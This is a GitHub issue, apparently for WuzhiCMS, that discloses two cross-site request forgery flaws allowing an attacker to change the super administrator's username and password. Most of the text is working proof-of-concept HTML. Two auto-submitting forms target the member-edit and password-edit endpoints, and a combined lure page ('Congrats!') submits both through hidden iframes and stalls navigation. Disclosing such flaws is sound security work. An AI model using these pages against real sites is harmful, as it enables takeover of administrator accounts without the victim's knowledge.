New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Two CSRF vulnerabilities that can change the super administrator's username and password #156

Open
sfpskywood opened this Issue Oct 25, 2018 · 0 comments

Comments

Projects
None yet
1 participant
@sfpskywood

sfpskywood commented Oct 25, 2018

When the super administrator (uid = 1) logged in, there are 2 important POST methods without CSRF protection, can change his username and password respectively. This can be achieved by cheating the super administrator to open the 2 pages when he logged in.
poc1.html (Change the username to 'hacker')

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof Of Concept - Change Super Admin Username</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost:8008/wuzhicms/index.php?m=member&f=index&v=edit&uid=1&_su=wuzhicms&_menuid=30&submit" method="POST">
      <input type="hidden" name="info&#91;username&#93;" value="hacker" />
      <input type="hidden" name="info&#91;email&#93;" value="xxx&#64;xxx&#46;xxx" />
      <input type="hidden" name="modelids&#91;&#93;" value="xxx" />
    </form>
  </body>
</html>

poc2.html (Change the password to '123456')

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof Of Concept - Change Super Admin Password</title>
  <script type="text/javascript">
    function exec2(){
      document.getElementById('form2').submit();
    }
  </script>
  </head>
  <body onload="exec2();">
    <form id="form2" action="http://localhost:8008/wuzhicms/index.php?m=core&f=panel&v=edit_info&_su=wuzhicms&_menuid=20&submit" method="POST">
      <input type="hidden" name="form&#91;password&#93;" value="123456" />
    </form>
  </body>
</html>

Or we made only 1 page POC to make it easy to attack.
poc.html

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof Of Concept - Put Them Together</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
      setTimeout(exec2, 3000);
    }
    function exec2(){
      document.getElementById('form2').submit();
    }
    window.onbeforeunload=function(){
      return "please wait";
    }
  </script>
  </head>
  <body onload="exec1();">
    <h3> Dear User </h3><h4><div id='r3'> Congrats! </div> </h4>
    <form id="form1" target="if1" action="http://localhost:8008/wuzhicms/index.php?m=member&f=index&v=edit&uid=1&_su=wuzhicms&_menuid=30&submit" method="POST">
      <input type="hidden" name="info&#91;username&#93;" value="hacker" />
      <input type="hidden" name="info&#91;email&#93;" value="xxx&#64;xxx&#46;xxx" />
      <input type="hidden" name="modelids&#91;&#93;" value="xxx" />
    </form>
    <form id="form2" target="if2" action="http://localhost:8008/wuzhicms/index.php?m=core&f=panel&v=edit_info&_su=wuzhicms&_menuid=20&submit" method="POST">
      <input type="hidden" name="form&#91;password&#93;" value="123456" />
    </form>
    <iframe name="if1" style="display: hidden=" width="0" height="0" frameborder="0"></iframe>
    <iframe name="if2" style="display: hidden=" width="0" height="0" frameborder="0"></iframe>
  </body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment